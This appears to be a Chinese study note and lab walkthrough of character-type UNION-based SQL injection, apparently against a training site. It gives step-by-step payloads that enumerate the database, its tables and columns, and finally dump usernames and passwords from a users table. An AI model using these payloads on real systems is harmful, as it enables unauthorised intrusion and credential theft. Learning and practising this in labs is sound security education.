知识点:
明白数值注入和字符注入的区别
- 数值注入:通过数字运算判断,1/0 1/1
- 字符注入:通过引号进行判断,奇数个和偶数个单引号进行识别
联合查询:union 或者 union all
- 需要满足字段数一致,否则报错
- 将输入数据和查询数据进行格式整合然后输出
group_concat()
- group_concat( [distinct] 要连接的字段 [order by 排序字段 asc/desc ] [separator '分隔符'] )
- []中内容为可选内容
- distinct:去重
- 先分组再合并,将格式分组后的字符串合并成一个长字符串;默认分隔符为逗号
concat()
- 将多个字符串拼接成一个字符串;只是将对应字段数据按格式合并形成新的字段数据;数据有多个
- 没有分隔符
concat_ws(分隔符,字符串)
- 将多个字符串拼接成一个字符串;只是将对应字段数据按格式合并形成新的字段数据;数据有多个
- 可以设定分隔符,第一个变量为分隔符数据
第一步 测试是否存在sql注入点
利用bp进行抓包测试发现存在sql注入;
构造id=2' 发现数据库报错,但是id=2'' 却不报错;这里应该存在字符型sql注入;
而且查询语句应该是 select 1,2,3 from 表名 where id = '输入信息' limit 0,1
1,2,3表示字段名;应该是2个或3个字段;
第二步 测试注入点的查询规则
既然知道了这里存在注入点下面就开始对它进行注入
构造payload:id=0'+or+1=1--+
发现只返回了一条数据;应该是输出格式限制了;只能显示一条数据
构造payload:id=0'+or+1=0--+
发现什么也没有;这说明条件为假时返回为空
第三步 测试原语句中的查询字段数
好了,整体的查询语句应该就是我上面写的那个;字段数不确定,现在测试一下查询的字段数;
构造payload:id=0'+union+select+1+--+
发现提示字段数量不对
猜测字段数量为3
构造payload:id=0'+union+select+1,2,3+--+
成功出结果了;说明原查询语句中字段数为3;而且输入信息被打印出来了;
有回显说明可以直接查询到一些关键信息,不用再bp爆破了
第四步 利用联合查询查找数据库名和版本信息
构造payload:id=0'+union+select+1,database(),version()+--+
界面显示除了数据库名字和版本信息
第五步 查询指定数据库下的表信息
接下来开始查询数据库下面有几张表
构造payload:id=0'+union+select+1,2,group_concat(table_name)+from+information_schema.tables+where+table_schema='security'+--+
第六步 查询表中的字段信息
发现有一张表为users;这应该是用户表;存放用户的相关信息;那就找一下这张表的字段名有哪些吧
构造payload: id=0'+union+select+1,2,group_concat(column_name)+from+information_schema.columns+where+table_name='users'+--+
发现输出了一堆字段名;里面有username和password字段;这应该是比较关键的信息;
第七步 查询指定字段的数据
查询users表中的username和password的信息;
构造payload:id=0'+union+select+1,2,group_concat('*',username,':',password)+from+users+--+
用户名和密码信息都被打印出来了
10
)
